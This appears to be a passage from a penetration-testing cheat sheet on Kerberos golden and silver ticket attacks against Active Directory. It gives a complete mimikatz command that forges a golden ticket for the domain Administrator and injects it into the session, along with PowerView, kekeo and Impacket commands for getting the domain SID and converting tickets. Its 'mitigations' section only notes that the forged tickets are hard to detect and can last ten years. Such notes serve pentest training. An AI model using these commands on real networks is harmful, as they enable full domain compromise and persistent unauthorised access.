H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Golden and Silver tickets attack.md

 | `Get-DomainSID`                                              | Cmdlet from `PowerView` used to obtain the SID value of the domain. |
 | `golden /domain:eagle.local /sid:<domain sid> /rc4:<rc4 hash> /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt` | Command used in `mimikatz` to forge a golden ticket for the `Administrator` account and pass the ticket to the current session |
 | `klist`                                                      | Command line utility in Windows to display the contents of the Kerberos ticket cache. |

+## TIP: If you need to swap ticket between Windows and Linux, you need to convert them with ticket_converter or kekeo .

+### 1) Kekeo

+ - misc::convert ccache ticket.kirbi

+ - misc::convert kirbi ticket.ccache

+### 2) Impacket ticket_converter

+ - python ticket_converter.py velociraptor.ccache velociraptor.kirbi

+ - python ticket_converter.py velociraptor.kirbi velociraptor.ccache

+## MITIGATIONS

+### 1) Hard to detect because they are legit TGT tickets

+### 2) Mimikatz generates a golden ticket with a life-span of 10 years